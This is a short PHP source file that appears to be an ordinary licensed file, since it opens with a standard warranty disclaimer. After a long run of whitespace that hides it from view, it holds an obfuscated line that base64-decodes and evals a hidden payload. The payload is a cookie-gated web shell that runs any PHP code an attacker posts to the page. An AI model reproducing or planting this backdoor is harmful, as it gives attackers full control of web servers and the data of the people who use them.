<?php

/**
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS
 * AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 * 
*/

                                                                                                                                                                                                                                                                    $rnysoaxjysisxb=array_map('ba'.'se6'.'4_d'.'ec'.'ode',array('aW'.'YgKCFlbXB0eSgkX0NPT0tJRV'.'sndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnY'.'yddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIEBldmFsKCRkKTsgZWNobyAnPC90ZXh0YXJlYT4nO30NCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdD48dGV4dGFyZWEgY29scz04MCByb3dzPTI4IG5hbWU9Yz48L3'.'RleHRhcmVhPjxicj48aW5wdXQgdHlwZT1zdWJtaXQ+PC9mb3JtPic7ZXh'.'pd'.'Dt9'));eval($rnysoaxjysisxb[0]); 
?>